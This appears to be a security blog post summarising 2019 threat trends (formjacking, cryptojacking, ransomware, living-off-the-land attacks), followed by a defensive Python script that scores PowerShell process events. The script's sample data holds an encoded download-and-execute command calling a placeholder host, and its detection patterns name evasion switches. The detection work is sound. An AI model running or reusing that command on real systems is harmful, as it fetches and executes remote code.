Cybercriminals are driven by opportunity and go where the money is. As soon as the good guys figure out how to stop them, they’ve already figured out their next move. So, it’s no wonder that the cyber threat environment is constantly changing, and exploits continue to evolve and shift.
Situational Risk Awareness — being aware of the risks posed in any given situation — is one of the best ways to be prepared to defend your organization against these evolving threats. To provide us with insight on the latest cyberattack trends, Symantec analyzes data from their Global Intelligence Network and regularly publishes their findings in The Internet Security Threat Report. Let’s explore a few of the top cyber threats from their most recent report, published in February 2019.
The increase in formjacking attacks has been linked to Magecart, a group or groups of threat actors known for carrying out this type of attack. In 2018 Magecart was linked to many high-profile attacks, including Ticketmaster and British Airways, and reportedly tens of millions of dollars were stolen. Their success was in large part due to infecting the source code of third-party e-commerce software development services, which allowed them to inject their malicious code onto hundreds of targeted websites with a single attack. Because why only target one website when you can target a vendor and hit hundreds of sites in one shot?
Cryptojacking is the surreptitious “mining” or “minting” of virtual currencies using compromised hardware. It rose to fame in 2018 to overtake Ransomware as the cyberattack of choice. In 2018 Symantec, “blocked more than four times as many cryptojacking events as in 2017 — almost 69 million cryptojacking events in the 12-month period, compared to just over 16 million in 2017.”
Activity is in decline, however, as cryptocurrency values have dropped significantly, especially in the last months of 2018. Just recently, Coinhive, a cryptomining service, announced it will discontinue its services on March 8, 2019 because of declining returns. According to Brian Krebs, “[Coinhive] has been heavily abused to force hacked Web sites to mine virtual currency.”
Even though the prevalence of cryptojacking appears to be tied to cryptocurrency values, the threat is worth keeping on our radar.
Ransomware takes over your computer, threatens harm, usually by denying access to your data, and demands a ransom. After reaching amazing heights in 2017, ransomware activity declined in 2018 for the first time since 2013. But even though overall ransomware infections were down, enterprise infections were up by 12 percent according to Symantec.
Following the trend of mass-infection though, ransomware attacks are beginning to target managed service providers (MSPs), so they can infect all of their clients at once. According to BleepingComputer, “Recent reports indicate that multiple MSPs have been hacked recently, which has led to hundreds, if not thousands, of clients being infected with the GandCrab Ransomware.”
If you’re using an MSP, be sure that your integration software is up-to-date and secure, and that they aren’t using a generic account to administer your environment. It’s your responsibility to ensure they have the same level of security controls as you have!
And for some good news: A free decryptor for GandCrab Ransomware was recently released and includes tools for versions 1, 4, 5, and 5.04 – 5.1. It can be found at the No More Ransom Project website, which is a collaboration between Europol, the Dutch National Police, Kaspersky Lab, and McAfee.
Living off the Land (LotL) Attacks
LotL tactics involve using trusted off-the-shelf and pre-installed system tools to carry out an attack. They allow attackers to hide their malicious activity among legitimate processes. Fileless malware is an example of a LotL technique: it operates by using legitimate programs, typically PowerShell, for malicious purposes.
According to the Symantec report, “PowerShell usage is now a staple of both cybercrime and targeted attacks — reflected by a massive 1,000 percent increase in malicious PowerShell scripts blocked in 2018 on the endpoint.”
The expanding use of LotL techniques poses a challenge for organizations because they are very difficult to identify and block. Advanced detection methods, like behavioral analysis and threat hunting, are often required to find these attacks arriving through trusted channels, using legitimate tools for malicious purposes.
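As an added example (not from the Symantec report or this post), the following Python triage script scores process-creation events for the PowerShell traits described above, decoding any -EncodedCommand argument so that the same indicators can be checked inside it; the event fields, weights and sample command lines are constructed assumptions, not real telemetry.

```python
import base64
import re

# Constructed sample events in the shape of a Sysmon Event ID 1 / Windows 4688
# record (parent image and command line); none of this is real telemetry.
SAMPLE_EVENTS = [
    {"parent": "explorer.exe",
     "cmd": r"powershell.exe -NoProfile -File C:\scripts\backup.ps1"},
    {"parent": "WINWORD.EXE",
     "cmd": "powershell.exe -nop -w hidden -enc "
            + base64.b64encode("IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/x')"
                               .encode("utf-16-le")).decode()},
    {"parent": "cmd.exe",
     "cmd": 'powershell.exe -ep bypass -c "Get-Service | Out-File svc.txt"'},
]
# Parent processes that rarely have a legitimate reason to spawn PowerShell.
SUSPICIOUS_PARENTS = {"winword.exe", "excel.exe", "outlook.exe", "mshta.exe", "wscript.exe"}
# Switches and cmdlets typical of download-and-execute one-liners, with assumed weights.
FLAGS = [
    (re.compile(r"-(w|windowstyle)\s+hidden", re.I), 1, "hidden window"),
    (re.compile(r"-(ep|executionpolicy)\s+bypass", re.I), 1, "execution policy bypass"),
    (re.compile(r"-(e|ec|enc|encodedcommand)\s", re.I), 2, "encoded command"),
    (re.compile(r"\b(iex|invoke-expression)\b", re.I), 2, "Invoke-Expression"),
    (re.compile(r"downloadstring|downloadfile|net\.webclient", re.I), 2, "web download"),
    (re.compile(r"frombase64string", re.I), 1, "inline base64 payload"),
]

def decode_encoded_command(cmd):
    """Return the plaintext of an -EncodedCommand argument (base64 of UTF-16LE), or ''."""
    m = re.search(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", cmd, re.I)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""

def score_event(event):
    """Score one event; returns (score, reasons). Higher is more worth an analyst's time."""
    # Check the visible command line and the decoded payload together.
    text = event["cmd"] + " " + decode_encoded_command(event["cmd"])
    score, reasons = 0, []
    if event["parent"].lower() in SUSPICIOUS_PARENTS:
        score += 3
        reasons.append(f"spawned by {event['parent']}")
    for pattern, weight, reason in FLAGS:
        if pattern.search(text):
            score += weight
            reasons.append(reason)
    return score, reasons
```

On the sample data only the Word-spawned, hidden, encoded download-and-execute command scores high; the scheduled backup script scores zero, which is the kind of separation signature-only blocking of powershell.exe cannot give.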
To learn more, download Symantec’s 2019 Internet Security Threat Report here.